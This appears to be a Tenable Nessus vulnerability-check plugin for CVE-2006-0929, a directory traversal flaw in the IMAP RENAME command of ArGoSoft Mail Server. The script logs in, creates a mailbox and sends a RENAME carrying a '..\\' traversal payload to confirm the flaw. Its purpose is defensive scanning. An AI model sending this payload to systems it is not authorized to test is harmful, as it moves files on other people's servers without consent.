4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:S/C:N/I:P/A:N
0.004 Low
EPSS
Percentile
73.4%
The remote host is running ArGoSoft Mail Server, a messaging system for Windows.
The IMAP server bundled with the version of ArGoSoft Mail Server installed on the remote host fails to filter directory traversal sequences from mailbox names passed to the ‘RENAME’ command. An authenticated attacker can exploit this issue to move mailboxes to any location on the affected system.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description) {
script_id(20977);
script_version("1.22");
script_cve_id("CVE-2006-0929");
script_bugtraq_id(16809);
script_name(english:"ArGoSoft Mail Server Pro IMAP RENAME Command Traversal Arbitrary Directory Creation");
script_summary(english:"Checks for directory traversal vulnerability in ArGoSoft IMAP server");
script_set_attribute(attribute:"synopsis", value:
"The remote IMAP server is subject to directory traversal attacks." );
script_set_attribute(attribute:"description", value:
"The remote host is running ArGoSoft Mail Server, a messaging system
for Windows.
The IMAP server bundled with the version of ArGoSoft Mail Server
installed on the remote host fails to filter directory traversal
sequences from mailbox names passed to the 'RENAME' command. An
authenticated attacker can exploit this issue to move mailboxes to any
location on the affected system." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2006/Feb/448" );
script_set_attribute(attribute:"see_also", value:"https://www.argosoft.com/rootpages/mailserver/ChangeList.aspx" );
script_set_attribute(attribute:"solution", value:
"Upgrade to ArGoSoft Mail Server 1.8.8.6 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/25");
script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/14");
script_cvs_date("Date: 2018/11/15 20:50:23");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_MIXED_ATTACK);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
script_dependencies("find_service1.nasl", "imap_overflow.nasl");
script_require_keys("imap/login", "imap/password");
script_require_ports("Services/imap", 143);
exit(0);
}
include("global_settings.inc");
include("imap_func.inc");
include("misc_func.inc");
port = get_service(svc: "imap", default: 143, exit_on_fail: 1);
if (get_kb_item("imap/"+port+"/false_imap")
|| get_kb_item("imap/"+port+"/overflow")) exit(0);
# Make sure the banner is from ArGoSoft.
banner = get_imap_banner(port:port);
if (!banner) exit(1, "No IMAP banner on port "+port+".");
if ("IMAP Module of ArGoSoft Mail Server" >!< banner)
exit(0, "The IMAP server on port "+port+" is not ArGoSSoft.");
user = get_kb_item_or_exit("imap/login");
pass = get_kb_item_or_exit("imap/password");
# Establish a connection.
tag = 0;
soc = open_sock_tcp(port);
if (!soc) exit(1, "Cannot connect to TCP port "+port+".");
# Read banner.
s = recv_line(socket:soc, length:1024);
if (!strlen(s)) {
close(soc);
exit(1, "Cannot read IMAP banner from port "+port+".");
}
# Try to log in.
++tag;
resp = NULL;
c = string("nessus", string(tag), " LOGIN ", user, " ", pass);
send(socket:soc, data:string(c, "\r\n"));
while (s = recv_line(socket:soc, length:1024)) {
s = chomp(s);
m = eregmatch(pattern:string("^nessus", string(tag), " (OK|BAD|NO)"), string:s, icase:TRUE);
if (!isnull(m)) {
resp = m[1];
break;
}
}
# If successful, try to exploit the flaw.
if (resp && resp =~ "OK") {
++tag;
resp = NULL;
mailbox = string("nessus-", unixtime());
# First, we create a mailbox we can rename.
c = string("nessus", string(tag), " CREATE ", mailbox);
send(socket:soc, data:string(c, "\r\n"));
while (s = recv_line(socket:soc, length:1024)) {
s = chomp(s);
m = eregmatch(pattern:string("^nessus", string(tag), " (OK|BAD|NO)"), string:s, icase:TRUE);
if (!isnull(m)) {
resp = m[1];
break;
}
}
# Now move it to under the application's main directory.
if (resp && resp =~ "OK" && "Folder created" >< s) {
c = string(
"nessus", string(tag),
" RENAME ",
mailbox,
' "...\\..\\..\\..\\..\\', mailbox, '"'
);
send(socket:soc, data:string(c, "\r\n"));
while (s = recv_line(socket:soc, length:1024)) {
s = chomp(s);
m = eregmatch(pattern:string("^nessus", string(tag), " (OK|BAD|NO)"), string:s, icase:TRUE);
if (!isnull(m)) {
resp = m[1];
break;
}
}
}
# There's a problem if we were successful; ie, "nessus3 OK RENAME completed".
if (resp && resp =~ "OK" && "RENAME completed" >< s) {
if (report_verbosity > 0) {
report = string(
"Nessus was able to create the following directory on the remote\n",
"host, under the directory in which ArGoSoft Mail Server is\n",
"installed :\n",
"\n",
" ", mailbox
);
}
else report = NULL;
security_warning(port:port, extra:report);
}
}
else if (resp =~ "BAD" || resp =~ "NO") {
debug_print("couldn't login with supplied imap credentials!", level:2);
}
# Logout.
++tag;
resp = NULL;
c = string("nessus", string(tag), " LOGOUT");
send(socket:soc, data:string(c, "\r\n"));
n = 0;
while (s = recv_line(socket:soc, length:1024)) {
s = chomp(s);
m = eregmatch(pattern:string("^nessus", string(tag), " (OK|BAD|NO)"), string:s, icase:TRUE);
if (!isnull(m)) {
resp = m[1];
break;
}
n ++;
if ( n > 200 ) break;
}
close(soc);